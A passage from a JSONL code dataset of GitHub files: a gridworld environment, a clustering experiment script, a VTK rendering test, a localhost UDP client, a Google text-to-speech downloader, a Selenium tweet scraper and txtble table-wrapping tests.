np.exp(self.w_pc[agentcol])/np.sum(np.exp(self.w_pc))\n\t\tp_gr = np.exp(self.w_gr[goalrow])/np.sum(np.exp(self.w_gr))\n\t\tp_gc = np.exp(self.w_gc[goalcol])/np.sum(np.exp(self.w_gc))\n\t\treturn p_r * p_c * p_gr * p_gc\n\t\n\tdef dInitialProb_dw(self, agentrow, agentcol, goalrow, goalcol):\n\t\tdw_pr = -np.exp(self.w_pr)/np.sum(np.exp(self.w_pr))\n\t\tdw_pr[agentrow] += 1\n\t\tdw_pc = -np.exp(self.w_pc)/np.sum(np.exp(self.w_pc))\n\t\tdw_pc[agentcol] += 1\n\t\tdw_gr = -np.exp(self.w_gr)/np.sum(np.exp(self.w_gr))\n\t\tdw_gr[goalrow] += 1\n\t\tdw_gc = -np.exp(self.w_gc)/np.sum(np.exp(self.w_gc))\n\t\tdw_gc[goalcol] += 1\n\t\treturn np.ravel(np.array([dw_pr,dw_pc,dw_gr,dw_gc]))\n\n\tdef getInitialProbs(self):\n\t\tp_r = np.exp(self.w_pr)/np.sum(np.exp(self.w_pr))\n\t\tp_c = np.exp(self.w_pc)/np.sum(np.exp(self.w_pc))\n\t\tp_gr = np.exp(self.w_gr)/np.sum(np.exp(self.w_gr))\n\t\tp_gc = np.exp(self.w_gc)/np.sum(np.exp(self.w_gc))\n\t\treturn [p_r,p_c,p_gr,p_gc]\n\n\tdef encode(self, agentrow, agentcol, goalrow, goalcol):\n\t\t# (5) 5, 5, 5\n\t\ti = agentrow\n\t\ti *= 5\n\t\ti += agentcol\n\t\ti *= 5\n\t\ti += goalrow\n\t\ti *= 5\n\t\ti += goalcol\n\t\treturn i\n\n\tdef decode(self, i):\n\t\tout = []\n\t\tout.append(i % 5)\n\t\ti = i // 5\n\t\tout.append(i % 5)\n\t\ti = i // 5\n\t\tout.append(i % 5)\n\t\ti = i // 5\n\t\tout.append(i)\n\t\tassert 0 <= i < 5\n\t\treturn reversed(out)\n\n\tdef render(self, mode='human'):\n\t\toutfile = StringIO() if mode == 'ansi' else sys.stdout\n\n\t\tout = self.desc.copy().tolist()\n\t\tout = [[c for c in line] for line in out]\n\t\tagentrow, agentcol, goalrow, goalcol = self.decode(self.s)\n\t\tdef ul(x): return \"_\" if x == \" \" else x\n\t\tout[1+agentrow][2*agentcol+1] = utils.colorize(' ', 'yellow', bold=True, highlight=True)\n\t\tout[1+goalrow][2*goalcol+1] = utils.colorize('G', 'blue', bold=True, highlight=True)\n\n\t\tif (agentrow, agentcol) == (goalrow, goalcol):\n\t\t\tout[1+agentrow][2*agentcol+1] = utils.colorize('G', 'yellow', bold=True, highlight=True)\n\n\t\toutfile.write(\"\\n\".join([\"\".join(row) for row in out])+\"\\n\")\n\t\tif self.lastaction is not None:\n\t\t\toutfile.write(\" ({})\\n\".format([\"UP\", \"DOWN\", \"LEFT\", \"RIGHT\"][self.lastaction]))\n\t\telse: outfile.write(\"\\n\")\n\n\t\t# No need to return anything for human\n\t\tif mode != 'human':\n\t\t\treturn outfile\n","repo_name":"nondecidibile/cmdp","sub_path":"gym/envs/toy_text/gridworld.py","file_name":"gridworld.py","file_ext":"py","file_size_in_byte":4326,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"31894395880","text":"import os,argparse\nfrom Tuned_Param import *\n\n###################################################################\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"dataset\", \n help=\"dataset.\",\n type=str,\n )\nparser.add_argument(\"init\", \n help=\"Initialization\",\n choices=['rand','pre'], \n default='rand', \n type=str, \n )\n\nparser.add_argument(\"-b\",\"--batch\", \n help=\"Batch size\",\n default=256,\n type=int,\n )\n\nparser.add_argument(\"-e\",\"--epoch\", \n help=\"Number of epochs\",\n default=150,\n type=int,\n )\n\nparser.add_argument(\"-r\",\"--runs\", \n help=\"Number of runs\",\n default=20,\n type=int,\n )\n\nparser.add_argument(\"-g\",\"--gpu\", \n help=\"Which GPU to use\",\n default=\"\",\n type=str,\n )\n\nparser.add_argument(\"--draft\", \n help=\"Is it a test? so we don't save.'\",\n action=\"store_true\",\n )\n \nargs = parser.parse_args()\n\n\n###################################################################\n\n# Set this before loading the module\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\nos.environ[\"CUDA_VISIBLE_DEVICES\"]= args.gpu\n\nfrom Module.module_CM import CM\nfrom Module.utils import *\n\n############################################################################\n\nNAME = args.dataset.upper()\nINIT = args.init.lower()\nSAVE = ~args.draft\n\nLOAD = np.load('data/'+NAME+'.npz',allow_pickle=True)\nDATA = LOAD['x'].astype('float32')\nTRUE = LOAD['y']\ndel LOAD\n\nN,D = DATA.shape\nK = int( TRUE.max()+1 )\nALPHA = CM_UNIF[NAME]['CC']\nBATCH = int(CM_UNIF[NAME]['BATCH'])\n\nif SAVE:\n FNAME = NAME+'/save/save-cm-'+ INIT + '.npz'\n \n if not os.path.exists(NAME+'/'):\n os.mkdir(NAME+'/')\n if not os.path.exists(NAME+'/save/'):\n os.mkdir(NAME+'/save/')\n print(\"*** I will save in \",FNAME)\n if os.path.exists(FNAME):\n print('Already done.')\n sys.exit()\n raise ValueError\n\nLLK = []\nLBL = []\nARI,NMI,ACC = [],[],[]\nEPC = []\n\nfor r in range(args.runs):\n print( \"\\n>>> \"+NAME+\": CM+\"+INIT+\" RUN=\",r+1)\n MODEL = CM( \n input_dim=D, \n n_clusters=K, \n true_labels=TRUE, \n )\n \n if INIT == 'pre':\n MODEL.pre_fit( \n x=DATA, \n y=TRUE,\n verbose=True,\n )\n\n epc = MODEL.fit( \n x=DATA,\n y=TRUE,\n alpha=ALPHA,\n batch_size=BATCH, \n epoch_size=args.epoch, \n optimizer_name='adam|3',\n print_interval=0, \n verbose=True,\n )\n \n LLK.append( MODEL.loss(DATA,0) )\n \n LBL.append( MODEL.predict(DATA) )\n ARI.append( ari( TRUE, LBL[-1] ) )\n NMI.append( nmi( TRUE, LBL[-1] ) )\n ACC.append( acc( TRUE, LBL[-1] ) )\n \n EPC.append( epc )\n \n del MODEL\n \n print( 'ARI: {:.5} NMI: {:.5} ACC: {:.5} EPC: {:.5}'.format(\n np.mean(ARI), \n np.mean(NMI), \n np.mean(ACC), \n np.mean(EPC)\n )\n )\n \n if SAVE:\n np.savez(FNAME,\n llk=LLK,\n lbl=LBL,\n ari=ARI,nmi=NMI,acc=ACC,\n epc=EPC\n )\n","repo_name":"Ahcene-B/clustering-Module","sub_path":"CM.py","file_name":"CM.py","file_ext":"py","file_size_in_byte":3561,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"9033118749","text":"#!/usr/bin/env python\nimport vtk\nfrom vtk.test import Testing\nfrom vtk.util.misc import vtkGetDataRoot\nVTK_DATA_ROOT = vtkGetDataRoot()\n\ndef GetRGBColor(colorName):\n '''\n Return the red, green and blue components for a\n color as doubles.\n '''\n rgb = [0.0, 0.0, 0.0] # black\n vtk.vtkNamedColors().GetColorRGB(colorName, rgb)\n return rgb\n\nVTK_VARY_RADIUS_BY_VECTOR = 2\n\n# create pipeline\n#\nreader = vtk.vtkDataSetReader()\nreader.SetFileName(VTK_DATA_ROOT + \"/Data/RectGrid2.vtk\")\nreader.Update()\n\ntoRectilinearGrid = vtk.vtkCastToConcrete()\ntoRectilinearGrid.SetInputConnection(reader.GetOutputPort())\ntoRectilinearGrid.Update()\nplane = vtk.vtkRectilinearGridGeometryFilter()\nplane.SetInputData(toRectilinearGrid.GetRectilinearGridOutput())\nplane.SetExtent(0, 100, 0, 100, 15, 15)\nwarper = vtk.vtkWarpVector()\nwarper.SetInputConnection(plane.GetOutputPort())\nwarper.SetScaleFactor(0.05)\nplaneMapper = vtk.vtkDataSetMapper()\nplaneMapper.SetInputConnection(warper.GetOutputPort())\nplaneMapper.SetScalarRange(0.197813, 0.710419)\nplaneActor = vtk.vtkActor()\nplaneActor.SetMapper(planeMapper)\n\ncutPlane = vtk.vtkPlane()\ncutPlane.SetOrigin(reader.GetOutput().GetCenter())\ncutPlane.SetNormal(1, 0, 0)\nplaneCut = vtk.vtkCutter()\nplaneCut.SetInputData(toRectilinearGrid.GetRectilinearGridOutput())\nplaneCut.SetCutFunction(cutPlane)\ncutMapper = vtk.vtkDataSetMapper()\ncutMapper.SetInputConnection(planeCut.GetOutputPort())\ncutMapper.SetScalarRange(\n reader.GetOutput().GetPointData().GetScalars().GetRange())\ncutActor = vtk.vtkActor()\ncutActor.SetMapper(cutMapper)\n\niso = vtk.vtkContourFilter()\niso.SetInputData(toRectilinearGrid.GetRectilinearGridOutput())\niso.SetValue(0, 0.7)\nnormals = vtk.vtkPolyDataNormals()\nnormals.SetInputConnection(iso.GetOutputPort())\nnormals.SetFeatureAngle(45)\nisoMapper = vtk.vtkPolyDataMapper()\nisoMapper.SetInputConnection(normals.GetOutputPort())\nisoMapper.ScalarVisibilityOff()\nisoActor = vtk.vtkActor()\nisoActor.SetMapper(isoMapper)\nisoActor.GetProperty().SetColor(GetRGBColor('bisque'))\nisoActor.GetProperty().SetRepresentationToWireframe()\n\nstreamer = vtk.vtkStreamTracer()\nstreamer.SetInputConnection(reader.GetOutputPort())\nstreamer.SetStartPosition(-1.2, -0.1, 1.3)\nstreamer.SetMaximumPropagation(500)\nstreamer.SetInitialIntegrationStep(0.05)\nstreamer.SetIntegrationDirectionToBoth()\n\nstreamTube = vtk.vtkTubeFilter()\nstreamTube.SetInputConnection(streamer.GetOutputPort())\nstreamTube.SetRadius(0.025)\nstreamTube.SetNumberOfSides(6)\nstreamTube.SetVaryRadius(VTK_VARY_RADIUS_BY_VECTOR)\nmapStreamTube = vtk.vtkPolyDataMapper()\nmapStreamTube.SetInputConnection(streamTube.GetOutputPort())\nmapStreamTube.SetScalarRange(\n reader.GetOutput().GetPointData().GetScalars().GetRange())\nstreamTubeActor = vtk.vtkActor()\nstreamTubeActor.SetMapper(mapStreamTube)\nstreamTubeActor.GetProperty().BackfaceCullingOn()\n\noutline = vtk.vtkOutlineFilter()\noutline.SetInputData(toRectilinearGrid.GetRectilinearGridOutput())\noutlineMapper = vtk.vtkPolyDataMapper()\noutlineMapper.SetInputConnection(outline.GetOutputPort())\noutlineActor = vtk.vtkActor()\noutlineActor.SetMapper(outlineMapper)\noutlineActor.GetProperty().SetColor(GetRGBColor('black'))\n\n# Graphics stuff\n# Create the RenderWindow, Renderer and both Actors\n#\nren1 = vtk.vtkRenderer()\nrenWin = vtk.vtkRenderWindow()\nrenWin.SetMultiSamples(0)\nrenWin.AddRenderer(ren1)\niren = vtk.vtkRenderWindowInteractor()\niren.SetRenderWindow(renWin)\n\n# Add the actors to the renderer, set the background and size\n#\nren1.AddActor(outlineActor)\nren1.AddActor(planeActor)\nren1.AddActor(cutActor)\nren1.AddActor(isoActor)\nren1.AddActor(streamTubeActor)\nren1.SetBackground(1, 1, 1)\n\nrenWin.SetSize(400, 400)\n\ncam1 = ren1.GetActiveCamera()\ncam1.SetClippingRange(3.76213, 10.712)\ncam1.SetFocalPoint(-0.0842503, -0.136905, 0.610234)\ncam1.SetPosition(2.53813, 2.2678, -5.22172)\ncam1.SetViewUp(-0.241047, 0.930635, 0.275343)\n\niren.Initialize()\n#iren.Start()\n","repo_name":"HopeFOAM/HopeFOAM","sub_path":"ThirdParty-0.1/ParaView-5.0.1/VTK/Filters/Geometry/Testing/Python/rectGrid.py","file_name":"rectGrid.py","file_ext":"py","file_size_in_byte":3929,"program_lang":"python","lang":"en","doc_type":"code","stars":78,"dataset":"github-code","pt":"72"} +{"seq_id":"5797024448","text":"import socket\n\ns = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\nprint(\"Cliente Socket criado com sucesso!!!\")\n\nhost = 'localhost'\nporta = 5433\nmensagem = \"Mensagem enviada pelo cliente\"\n\ntry:\n print(\"Cliente enviando mensagem: {}\".format(mensagem))\n s.sendto(mensagem.encode(), (host, 5432))\n print(\"Mensagem enviada com sucesso!!!\")\n\n dados, servidor = s.recvfrom(4096)\n dados = dados.decode()\n print(\"Mensagem recebida do servidor: {}\".format(dados))\nfinally:\n print(\"Fechando socket...\")\n s.close()\n","repo_name":"Manoel/Cognizant-Cloud-Data-Engineer-2","sub_path":"segurança_da_informação_com_python/scr/clienteudp.py","file_name":"clienteudp.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19267915166","text":"import collections\nimport io\nimport os\nimport sys\nimport textwrap\nimport urllib2\nfrom codecs import open as uopen\nfrom cookielib import CookieJar\nfrom shutil import copyfileobj\nfrom tempfile import mkstemp\nfrom urllib import pathname2url\n\n\n__all__ = ['TextToSpeech', 'TextToSpeechError']\n\n\nclass TextToSpeechError(Exception):\n pass\n\n\nclass TextToSpeech(object):\n substitutions = ( # list of substitutions\n (u'ё', u'йо'),\n (u'трех', u'трьох'),\n (u'хабрахабр', u'хабрах+абр'),\n )\n headers = (\n ('Host', 'translate.google.com'),\n ('User-Agent', ('Mozilla/5.0 (Windows; U; Windows NT 6.1;'\n ' en-US; rv:2.0.0) Gecko/20110320 Firefox/4.0.0')),\n ('Accept', 'text/html,application/xhtml+xml,'\n 'application/xml;q=0.9,*/*;q=0.8'),\n ('Accept-Language', 'en-us,en;q=0.5'),\n ('Accept-Encoding', 'gzip,deflate'),\n ('Accept-Charset', 'utf-8;q=0.7,*;q=0.7'),\n )\n\n def __init__(self, *inputs, **kwargs):\n self.language = kwargs.get('language', 'ru')\n if isinstance(kwargs.get('substitutions'), collections.Iterable):\n self.substitutions = substitutions\n buf = ''.join(\n stream.read() if isinstance(stream, file) else str(stream)\n for stream in inputs\n )\n\n self.buffer = self.split(buf.decode('utf-8'))\n self.opener = self.make_opener()\n self.files = []\n\n def make_opener(self):\n handler = urllib2.HTTPCookieProcessor(CookieJar())\n opener = urllib2.build_opener(handler)\n opener.addheaders = self.headers\n return opener\n\n def urls(self):\n \"\"\"Generates url to Google Translate MP3 file.\"\"\"\n tpl = u'http://translate.google.com/translate_tts?q=[{0}]&tl={1}'\n for line in self.buffer:\n yield tpl.format(pathname2url(line.encode('utf-8')), self.language)\n\n def split(self, buf, length=95):\n \"\"\"Splits files by sentences with maximum length=length.\"\"\"\n for fr, to in self.substitutions:\n buf = buf.replace(fr, to)\n return textwrap.wrap(buf, length, break_long_words=True)\n\n def download_voices(self):\n \"\"\"Downloads MP3s.\"\"\"\n for url in self.urls():\n # print url\n fd, path = mkstemp('.mp3')\n fd = os.fdopen(fd, 'wb+')\n try:\n page = self.opener.open(url)\n except urllib2.HTTPError:\n raise TextToSpeechError('Google blocked your computer. '\n 'To unblock it, follow this link: {0}'.format(page.url))\n copyfileobj(page, fd)\n fd.seek(0)\n self.files.append((path, fd))\n\n def delete_voices(self):\n \"\"\"Deletes all downloaded files.\"\"\"\n while self.files:\n path = self.files.pop()[0]\n os.unlink(path)\n\n def join_voices(self, to):\n \"\"\"Copies audiodata from all downloaded MP3s to result_file.\"\"\"\n first = True\n if not isinstance(to, file):\n to = open(to, 'wb')\n while self.files:\n path, fd = self.files.pop(0)\n if not first: # MP3 header\n fd.seek(32, 1)\n copyfileobj(fd, to)\n os.unlink(path)\n first = False\n return to\n\n def create(self, result):\n \"\"\"Downloads all voices and copies them to result_file.\"\"\"\n self.download_voices()\n return self.join_voices(result)\n","repo_name":"mosquito/TelePY","sub_path":"asterfiles/gTTS/gtexttospeech.py","file_name":"gtexttospeech.py","file_ext":"py","file_size_in_byte":3484,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"38740238564","text":"\r\nfrom selenium import webdriver\r\nimport time,codecs\r\n\r\n# Insert twitter profile in url\r\nurl='https://twitter.com/SHAQ'\r\n\r\n#open the browser and visit the url\r\ndriver = webdriver.Chrome('./chromedriver')\r\ndriver.get(url)\r\ntime.sleep(5)\r\n\r\nalready_seen=set()#keeps track of tweets we have already seen.\r\n\r\n#write the tweets to a file\r\nfw=codecs.open('tweets.txt','w',encoding='utf8')\r\n\r\nfor i in range(3):\r\n\r\n print(i)\r\n #find all elements that have the value \"tweet\" for the data-testid attribute\r\n tweets=driver.find_elements_by_css_selector('div[data-testid=\"tweet\"]')#\r\n print(len(tweets))\r\n for tweet in tweets:\r\n\r\n \r\n \r\n if tweet in already_seen:continue#we have seen this tweet before while scrolling down, ignore\r\n already_seen.add(tweet)#first time we see this tweet. Mark as seen and process.\r\n \r\n txt,comments,retweets,tweetDate,likes='NA','NA','NA','NA','NA'\r\n \r\n # Fetching Tweet Text\r\n try: \r\n txt=tweet.find_element_by_css_selector(\"div.css-901oao.r-1qd0xha.r-16dba41.r-ad9z0x.r-bcqeeo.r-bnwqim.r-qvutc0\").text\r\n txt=txt.replace('\\n', ' ')\r\n print(txt)\r\n except: print ('no text') \r\n \r\n # Fetching Tweet Comments\r\n try:\r\n #find the div element that havs the value \"comments\" for the data-testid attribute\r\n commentElement=tweet.find_element_by_css_selector('div[data-testid=\"reply\"]')\r\n \r\n #find the span element that has all the specified values (space separated) in its class attribute\r\n comments=commentElement.find_element_by_css_selector('span.css-901oao.css-16my406.r-1qd0xha.r-ad9z0x.r-bcqeeo.r-qvutc0').text \r\n print (comments) \r\n except:\r\n print ('no comments') \r\n \r\n # Fetching Tweet Retweets\r\n try:\r\n \r\n #find the div element that havs the value \"retweet\" for the data-testid attribute\r\n retweetElement=tweet.find_element_by_css_selector('div[data-testid=\"retweet\"]')\r\n \r\n #find the span element that has all the specified values (space separated) in its class attribute\r\n retweets=retweetElement.find_element_by_css_selector('span.css-901oao.css-16my406.r-1qd0xha.r-ad9z0x.r-bcqeeo.r-qvutc0').text \r\n print (retweets) \r\n except:\r\n print ('no retweets')\r\n \r\n # Fetching Tweet Likes\r\n try:\r\n \r\n #find the div element that havs the value \"likes\" for the data-testid attribute\r\n likeElement=tweet.find_element_by_css_selector('div[data-testid=\"like\"]')\r\n \r\n #find the span element that has all the specified values (space separated) in its class attribute\r\n likes=likeElement.find_element_by_css_selector('span.css-901oao.css-16my406.r-1qd0xha.r-ad9z0x.r-bcqeeo.r-qvutc0').text \r\n print (likes) \r\n except:\r\n print ('no likes') \r\n \r\n # Fetching Tweet Date\r\n try:\r\n tweetDate=tweet.find_element_by_css_selector('time').text \r\n print (tweetDate) \r\n except:\r\n print ('no date')\r\n \r\n \r\n\r\n #only write tweets that have text or retweets (or both). \r\n if txt!='NA' or retweets!='NA':\r\n fw.write(txt.replace('\\n',' ')+'\\t'+str(comments)+'\\t'+str(retweets)+'\\t'+str(likes)+'\\t'+str(tweetDate)+'\\n')\r\n print()\r\n print()\r\n\r\n \r\n #scroll down twice to load more tweets,you can also choose to scroll down multiple times\r\n driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\r\n time.sleep(2)\r\n\r\nfw.close()\r\n\r\n","repo_name":"vbhuvana7/Twitter-Web-scraping","sub_path":"Twitter.py","file_name":"Twitter.py","file_ext":"py","file_size_in_byte":3849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"24360386447","text":"from __future__ import annotations\nimport pytest\nfrom test_data import DATA, HEADERS\nfrom txtble import IndeterminateWidthError, Txtble\n\nLONG_STRING = \"Lorem ipsum dolor sit amet, consectetur adipisicing elit\"\n\n\ndef test_wrap() -> None:\n tbl = Txtble([[LONG_STRING, LONG_STRING]], widths=[20, 30])\n assert str(tbl) == (\n \"+--------------------+------------------------------+\\n\"\n \"|Lorem ipsum dolor |Lorem ipsum dolor sit amet, |\\n\"\n \"|sit amet, |consectetur adipisicing elit |\\n\"\n \"|consectetur | |\\n\"\n \"|adipisicing elit | |\\n\"\n \"+--------------------+------------------------------+\"\n )\n\n\n@pytest.mark.parametrize(\"widths\", [[20], [20, None], [20, None, 30]])\ndef test_wrap_no_wrap(widths: list[int | None]) -> None:\n tbl = Txtble([[LONG_STRING, LONG_STRING]], widths=widths)\n assert str(tbl) == (\n \"+--------------------+--------------------------------------------------------+\\n\"\n \"|Lorem ipsum dolor |Lorem ipsum dolor sit amet, consectetur adipisicing elit|\\n\"\n \"|sit amet, | |\\n\"\n \"|consectetur | |\\n\"\n \"|adipisicing elit | |\\n\"\n \"+--------------------+--------------------------------------------------------+\"\n )\n\n\ndef test_no_wrap_wrap() -> None:\n tbl = Txtble([[LONG_STRING, LONG_STRING]], widths=[None, 30])\n assert str(tbl) == (\n \"+--------------------------------------------------------+------------------------------+\\n\"\n \"|Lorem ipsum dolor sit amet, consectetur adipisicing elit|Lorem ipsum dolor sit amet, |\\n\"\n \"| |consectetur adipisicing elit |\\n\"\n \"+--------------------------------------------------------+------------------------------+\"\n )\n\n\ndef test_wrap_long_word() -> None:\n tbl = Txtble(\n [[LONG_STRING], [\"antidisestablishmentarianism\"]],\n row_border=True,\n widths=[20],\n )\n assert str(tbl) == (\n \"+--------------------+\\n\"\n \"|Lorem ipsum dolor |\\n\"\n \"|sit amet, |\\n\"\n \"|consectetur |\\n\"\n \"|adipisicing elit |\\n\"\n \"+--------------------+\\n\"\n \"|antidisestablishment|\\n\"\n \"|arianism |\\n\"\n \"+--------------------+\"\n )\n\n\ndef test_wrap_colored_long_word() -> None:\n tbl = Txtble(\n [[LONG_STRING], [\"\\033[31mantidisestablishmentarianism\\033[m\"]],\n row_border=True,\n widths=[20],\n )\n assert str(tbl) == (\n \"+--------------------+\\n\"\n \"|Lorem ipsum dolor |\\n\"\n \"|sit amet, |\\n\"\n \"|consectetur |\\n\"\n \"|adipisicing elit |\\n\"\n \"+--------------------+\\n\"\n \"|\\033[31mantidisestablishment\\033[m|\\n\"\n \"|\\033[31marianism\\033[m |\\n\"\n \"+--------------------+\"\n )\n\n\ndef test_wrap_long_word_no_break_long_words() -> None:\n tbl = Txtble(\n [[LONG_STRING], [\"antidisestablishmentarianism\"]],\n break_long_words=False,\n row_border=True,\n widths=[20],\n )\n assert str(tbl) == (\n \"+----------------------------+\\n\"\n \"|Lorem ipsum dolor |\\n\"\n \"|sit amet, |\\n\"\n \"|consectetur |\\n\"\n \"|adipisicing elit |\\n\"\n \"+----------------------------+\\n\"\n \"|antidisestablishmentarianism|\\n\"\n \"+----------------------------+\"\n )\n\n\n@pytest.mark.parametrize(\"break_long\", [True, False])\ndef test_wrap_long_hyphenated_word(break_long: bool) -> None:\n tbl = Txtble(\n [[LONG_STRING], [\"anti-dis-establish-ment-ari-an-ism\"]],\n break_long_words=break_long,\n row_border=True,\n widths=[20],\n )\n assert str(tbl) == (\n \"+--------------------+\\n\"\n \"|Lorem ipsum dolor |\\n\"\n \"|sit amet, |\\n\"\n \"|consectetur |\\n\"\n \"|adipisicing elit |\\n\"\n \"+--------------------+\\n\"\n \"|anti-dis-establish- |\\n\"\n \"|ment-ari-an-ism |\\n\"\n \"+--------------------+\"\n )\n\n\n@pytest.mark.parametrize(\"break_long\", [True, False])\ndef test_wrap_long_multi_hyphenated_word(break_long: bool) -> None:\n ### XXX: textwrap.wrap would insert a break before the '---'; should txtble\n ### do likewise?\n tbl = Txtble(\n [[LONG_STRING], [\"anti-dis-establish---ment-ari-an-ism\"]],\n break_long_words=break_long,\n row_border=True,\n widths=[20],\n )\n assert str(tbl) == (\n \"+--------------------+\\n\"\n \"|Lorem ipsum dolor |\\n\"\n \"|sit amet, |\\n\"\n \"|consectetur |\\n\"\n \"|adipisicing elit |\\n\"\n \"+--------------------+\\n\"\n \"|anti-dis-establish--|\\n\"\n \"|-ment-ari-an-ism |\\n\"\n \"+--------------------+\"\n )\n\n\ndef test_wrap_long_hyphenated_word_no_break_on_hyphens() -> None:\n tbl = Txtble(\n [[LONG_STRING], [\"anti-dis-establish-ment-ari-an-ism\"]],\n break_on_hyphens=False,\n row_border=True,\n widths=[20],\n )\n assert str(tbl) == (\n \"+--------------------+\\n\"\n \"|Lorem ipsum dolor |\\n\"\n \"|sit amet, |\\n\"\n \"|consectetur |\\n\"\n \"|adipisicing elit |\\n\"\n \"+--------------------+\\n\"\n \"|anti-dis-establish-m|\\n\"\n \"|ent-ari-an-ism |\\n\"\n \"+--------------------+\"\n )\n\n\n@pytest.mark.parametrize(\"hyph_break\", [True, False])\ndef test_wrap_long_soft_hyphenated_word(hyph_break: bool) -> None:\n # textwrap doesn't break on soft hyphens, so txtble shouldn't either.\n tbl = Txtble(\n [\n [LONG_STRING],\n [\"anti\\xADdis\\xADestablish\\xADment\\xADari\\xADan\\xADism\"],\n ],\n break_on_hyphens=hyph_break,\n row_border=True,\n widths=[20],\n )\n assert str(tbl) == (\n \"+--------------------+\\n\"\n \"|Lorem ipsum dolor |\\n\"\n \"|sit amet, |\\n\"\n \"|consectetur |\\n\"\n \"|adipisicing elit |\\n\"\n \"+--------------------+\\n\"\n \"|anti\\xADdis\\xADestablish\\xADm|\\n\"\n \"|ent\\xADari\\xADan\\xADism |\\n\"\n \"+--------------------+\"\n )\n\n\ndef test_wrap_some_cells() -> None:\n tbl = Txtble(\n [[LONG_STRING], [\"antidisestablishmentarianism\"]],\n row_border=True,\n widths=[30],\n )\n assert str(tbl) == (\n \"+------------------------------+\\n\"\n \"|Lorem ipsum dolor sit amet, |\\n\"\n \"|consectetur adipisicing elit |\\n\"\n \"+------------------------------+\\n\"\n \"|antidisestablishmentarianism |\\n\"\n \"+------------------------------+\"\n )\n\n\ndef test_wrap_shorter_than_width() -> None:\n tbl = Txtble(DATA, headers=HEADERS, widths=20)\n assert str(tbl) == (\n \"+--------------------+--------------------+--------------------+\\n\"\n \"|Month |Birthstone |Birth Flower |\\n\"\n \"+--------------------+--------------------+--------------------+\\n\"\n \"|January |Garnet |Carnation |\\n\"\n \"|February |Amethyst |Violet |\\n\"\n \"|March |Aquamarine |Jonquil |\\n\"\n \"|April |Diamond |Sweetpea |\\n\"\n \"|May |Emerald |Lily Of The Valley |\\n\"\n \"|June |Pearl |Rose |\\n\"\n \"|July |Ruby |Larkspur |\\n\"\n \"|August |Peridot |Gladiolus |\\n\"\n \"|September |Sapphire |Aster |\\n\"\n \"|October |Opal |Calendula |\\n\"\n \"|November |Topaz |Chrysanthemum |\\n\"\n \"|December |Turquoise |Narcissus |\\n\"\n \"+--------------------+--------------------+--------------------+\"\n )\n\n\ndef test_wrap_color() -> None:\n tbl = Txtble(\n [\n [\n \"\\033[31mLorem\\033[m\"\n \" \\033[32mipsum\\033[m\"\n \" \\033[33mdolor\\033[m\"\n \" \\033[34msit\\033[m \\033[35mamet\\033[m,\"\n \" \\033[36mconsectetur\\033[m\"\n \" \\033[41madipisicing\\033[m\"\n \" \\033[42melit\\033[m\"\n ]\n ],\n widths=[20],\n )\n assert str(tbl) == (\n \"+--------------------+\\n\"\n \"|\\033[31mLorem\\033[m \\033[32mipsum\\033[m \\033[33mdolor\\033[m |\\n\"\n \"|\\033[34msit\\033[m \\033[35mamet\\033[m, |\\n\"\n \"|\\033[36mconsectetur\\033[m |\\n\"\n \"|\\033[41madipisicing\\033[m \\033[42melit\\033[m |\\n\"\n \"+--------------------+\"\n )\n\n\ndef test_wrap_running_color() -> None:\n tbl = Txtble(\n [\n [\n \"\\033[31mLorem\"\n \" \\033[32mipsum\"\n \" \\033[33mdolor\"\n \" \\033[34msit \\033[35mamet,\"\n \" \\033[36mconsectetur\"\n \" \\033[41madipisicing\"\n \" \\033[42melit\\033[m\"\n ]\n ],\n widths=[20],\n )\n assert str(tbl) == (\n \"+--------------------+\\n\"\n \"|\\033[31mLorem \\033[32mipsum \\033[33mdolor\\033[m |\\n\"\n \"|\\033[31m\\033[32m\\033[33m\\033[34msit \\033[35mamet,\\033[m |\\n\"\n \"|\\033[31m\\033[32m\\033[33m\\033[34m\\033[35m\\033[36mconsectetur\\033[m |\\n\"\n \"|\\033[31m\\033[32m\\033[33m\\033[34m\\033[35m\\033[36m\\033[41madipisicing \\033[42melit\\033[m |\\n\"\n \"+--------------------+\"\n )\n\n\ndef test_wrap_long_color() -> None:\n tbl = Txtble([[\"\\033[31m\" + LONG_STRING + \"\\033[0m\"]], widths=[20])\n assert str(tbl) == (\n \"+--------------------+\\n\"\n \"|\\033[31mLorem ipsum dolor\\033[m |\\n\"\n \"|\\033[31msit amet,\\033[m |\\n\"\n \"|\\033[31mconsectetur\\033[m |\\n\"\n \"|\\033[31madipisicing elit\\033[0m |\\n\"\n \"+--------------------+\"\n )\n\n\ndef test_width_fill() -> None:\n tbl = Txtble([[LONG_STRING, LONG_STRING]], widths=[20], width_fill=30)\n assert str(tbl) == (\n \"+--------------------+------------------------------+\\n\"\n \"|Lorem ipsum dolor |Lorem ipsum dolor sit amet, |\\n\"\n \"|sit amet, |consectetur adipisicing elit |\\n\"\n \"|consectetur | |\\n\"\n \"|adipisicing elit | |\\n\"\n \"+--------------------+------------------------------+\"\n )\n\n\ndef test_width_fill_all() -> None:\n tbl = Txtble([[LONG_STRING, LONG_STRING]], width_fill=20)\n assert str(tbl) == (\n \"+--------------------+--------------------+\\n\"\n \"|Lorem ipsum dolor |Lorem ipsum dolor |\\n\"\n \"|sit amet, |sit amet, |\\n\"\n \"|consectetur |consectetur |\\n\"\n \"|adipisicing elit |adipisicing elit |\\n\"\n \"+--------------------+--------------------+\"\n )\n\n\n@pytest.mark.parametrize(\"width_fill\", [None, 30])\ndef test_widths_all(width_fill: int | None) -> None:\n tbl = Txtble([[LONG_STRING, LONG_STRING]], widths=20, width_fill=width_fill)\n assert str(tbl) == (\n \"+--------------------+--------------------+\\n\"\n \"|Lorem ipsum dolor |Lorem ipsum dolor |\\n\"\n \"|sit amet, |sit amet, |\\n\"\n \"|consectetur |consectetur |\\n\"\n \"|adipisicing elit |adipisicing elit |\\n\"\n \"+--------------------+--------------------+\"\n 